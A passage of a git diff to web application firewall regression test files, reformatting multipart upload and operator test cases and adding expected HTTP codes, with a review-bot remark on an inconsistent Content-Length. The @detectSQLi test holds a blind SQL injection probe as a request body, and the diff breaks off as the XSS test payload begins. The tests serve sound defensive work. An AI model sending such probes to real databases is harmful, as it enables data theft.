- "This is another very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - FILES_TMP_CONTENT 2", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "624", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" + }, + "uri": "/wheee/f%20i%20l%20e%20", + "method": "POST", + "body": [ + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + 
"Content-Disposition: form-data; name=\"name2\"\n", + "\n", + "test2\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"fiasdfasdfledata\" \n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" ] }, - "expected":{ - "error_log":"o15,5v560,32t:trim" + "expected": { + "error_log": "o15,5v560,32t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecUploadKeepFiles On", "SecUploadDir /tmp", 
@@ -1786,29 +2286,29 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - PATH_INFO", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" - }, - "uri":"/wheee/f%20i%20l%20e%20", - "method":"POST", - "body":[ + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - PATH_INFO", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "605", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" + }, + "uri": "/wheee/f%20i%20l%20e%20", + "method": "POST", + "body": [ "----------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"name\"", "", @@ -1830,10 +2330,19 @@ "----------------------------756b6d74fa1a8ee2--" ] }, - "expected":{ - "error_log":"o6,4v5,23t:trim" + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "error_log": "o6,4v5,23t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecUploadKeepFiles On", "SecUploadDir /tmp", 
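Review bot: In the PATH_INFO case the body elements remain context lines with no trailing `\n`, while `Content-Length` moves from `330` to `605`, which is the length of the 19 elements concatenated with no separator at all. The neighbouring FILES_TMP_CONTENT 2, MULTIPART_FILENAME and MULTIPART_NAME cases were changed to `\n`-terminated elements with `"Content-Length": "624"`. This leaves PATH_INFO as the only request whose boundary, part headers and content run together, so it may not be parsed as multipart unless the harness inserts line breaks itself. If that is not intended, append `\n` to each body element and set `"Content-Length": "624"`; the expected `o6,4v5,23t:trim` looks like a URI offset and presumably would not move. The middle of the body lies between the two hunks on this line and is not visible here.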
@@ -1841,54 +2350,63 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - MULTIPART_FILENAME", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" - }, - "uri":"/wheee/f%20i%20l%20e%20", - "method":"POST", - "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name2\"", - "", - "test2", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"fiasdfasdfledata\" ", - "Content-Type: text/plain", - "", - "This is another very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - MULTIPART_FILENAME", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "624", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" + }, + "uri": "/wheee/f%20i%20l%20e%20", + "method": "POST", + "body": [ + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + 
"Content-Disposition: form-data; name=\"name2\"\n", + "\n", + "test2\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"fiasdfasdfledata\" \n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" ] }, - "expected":{ - "error_log":"o0,20v680,20t:trim" + "expected": { + "error_log": "o0,20v680,20t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecUploadKeepFiles On", "SecUploadDir /tmp", 
@@ -1896,54 +2414,63 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - MULTIPART_NAME", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" - }, - "uri":"/wheee/f%20i%20l%20e%20", - "method":"POST", - "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name2\"", - "", - "test2", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"fiasdfasdfledata\" ", - "Content-Type: text/plain", - "", - "This is another very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - MULTIPART_NAME", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "624", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" + }, + "uri": "/wheee/f%20i%20l%20e%20", + "method": "POST", + "body": [ + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: 
form-data; name=\"name2\"\n", + "\n", + "test2\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"fiasdfasdfledata\" \n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" ] }, - "expected":{ - "error_log":"o0,16v709,16t:trim" + "expected": { + "error_log": "o0,16v709,16t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecUploadKeepFiles On", "SecUploadDir /tmp", 
@@ -1951,63 +2478,87 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - ARGS n", - "request":{ - "headers":{ - "Host":"localhost", - "Content-Length": "27", + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - ARGS n", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", + "Content-Length": "0", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/index.html?param01=5555&bbbbbbbmy_id=6", - "method":"GET" + "uri": "/index.html?param01=5555&bbbbbbbmy_id=6", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "http_code": 403, - "error_log":"o0,1v42,1" + "expected": { + "error_log": "o0,1v42,1", + "http_code": 403 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule ARGS \"@contains 6\" \"id:1,phase:2,deny,status:403,log\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - ARGS_NAMES n", - "request":{ - "headers":{ - "Host":"localhost", - "Content-Length": "27", + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - ARGS_NAMES n", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", + "Content-Length": "0", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/index.html?param01=5555&bbbbbbbmy_id=6", - "method":"GET" + "uri": "/index.html?param01=5555&bbbbbbbmy_id=6", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html", + 
"Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "http_code": 403, - "error_log":"o7,5v29,12" + "expected": { + "error_log": "o7,5v29,12", + "http_code": 403 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule ARGS_NAMES \"@contains my_id\" \"id:1,phase:2,deny,status:403,log\"" ] diff --git a/test/test-cases/regression/operator-UnconditionalMatch.json b/test/test-cases/regression/operator-UnconditionalMatch.json index 5f73a2ec2e..babba6d509 100644 --- a/test/test-cases/regression/operator-UnconditionalMatch.json +++ b/test/test-cases/regression/operator-UnconditionalMatch.json 
@@ -1,44 +1,46 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing Operator :: @UnconditionalMatch", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "Testing Operator :: @UnconditionalMatch", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "param1=value1¶m2=value2" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Rule returned 1" + "expected": { + "debug_log": "Rule returned 1", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule ARGS \"@UnconditionalMatch\" \"id:1,phase:2,pass,t:trim\"" ] diff --git a/test/test-cases/regression/operator-detectsqli.json b/test/test-cases/regression/operator-detectsqli.json index e2e33c908f..657bdf3884 100644 --- a/test/test-cases/regression/operator-detectsqli.json +++ b/test/test-cases/regression/operator-detectsqli.json 
@@ -1,44 +1,46 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing Operator :: @detectSQLi", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "Testing Operator :: @detectSQLi", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length": "27", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "61", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "param1=ascii(substring(version() from 1 for 1))¶m2=value2" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Added DetectSQLi match TX.0: f\\(f\\(f" + "expected": { + "debug_log": "Added DetectSQLi match TX.0: f\\(f\\(f", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule ARGS \"@detectSQLi\" \"id:1,phase:2,capture,pass,t:trim\"" ] diff --git a/test/test-cases/regression/operator-detectxss.json b/test/test-cases/regression/operator-detectxss.json index e2590193b0..9e6fa24b21 100644 --- a/test/test-cases/regression/operator-detectxss.json +++ b/test/test-cases/regression/operator-detectxss.json 
@@ -1,44 +1,46 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing Operator :: @detectXSS", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "Testing Operator :: @detectXSS", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length": "27", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "45", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ - "param1=